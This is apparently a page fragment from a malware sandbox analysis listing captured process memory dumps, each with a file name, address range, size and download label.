memory/2464-753-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2492-1005-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/3540-782-0x0000000000BB0000-0x0000000000BB6000-memory.dmp

Filesize
24KB

Download
memory/4372-692-0x00000130BB290000-0x00000130BB2B2000-memory.dmp

Filesize
136KB

Download
memory/4372-703-0x00000130BD8D0000-0x00000130BD946000-memory.dmp

Filesize
472KB

Download
memory/4372-702-0x00000130BD800000-0x00000130BD844000-memory.dmp

Filesize
272KB

Download
memory/4384-723-0x0000000000BE0000-0x0000000000C16000-memory.dmp

Filesize
216KB

Download
memory/4480-968-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/4480-994-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/4480-990-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/4776-910-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/4776-900-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/4776-959-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/4812-755-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4812-721-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/4828-1011-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/4828-1003-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/4828-986-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/4828-983-0x0000000000400000-0x00000000004A6000-memory.dmp

Filesize
664KB

Download
memory/4832-799-0x0000000002A50000-0x0000000002A65000-memory.dmp

Filesize
84KB

Download
memory/4832-965-0x0000000002A50000-0x0000000002A65000-memory.dmp

Filesize
84KB

Download
memory/4832-966-0x0000000002A70000-0x0000000002AD5000-memory.dmp

Filesize
404KB

Download
memory/4832-806-0x0000000002A70000-0x0000000002AD5000-memory.dmp

Filesize
404KB

Download
memory/4832-901-0x0000000000400000-0x0000000000579000-memory.dmp

Filesize
1.5MB

Download
memory/4832-903-0x0000000002A70000-0x0000000002AD5000-memory.dmp

Filesize
404KB

Download
memory/4832-902-0x0000000002A50000-0x0000000002A65000-memory.dmp

Filesize
84KB

Download
memory/5056-967-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/5056-985-0x0000000000400000-0x0000000000601000-memory.dmp

Filesize
2.0MB

Download
memory/5092-969-0x0000000000400000-0x00000000004FB000-memory.dmp

Filesize
1004KB

Download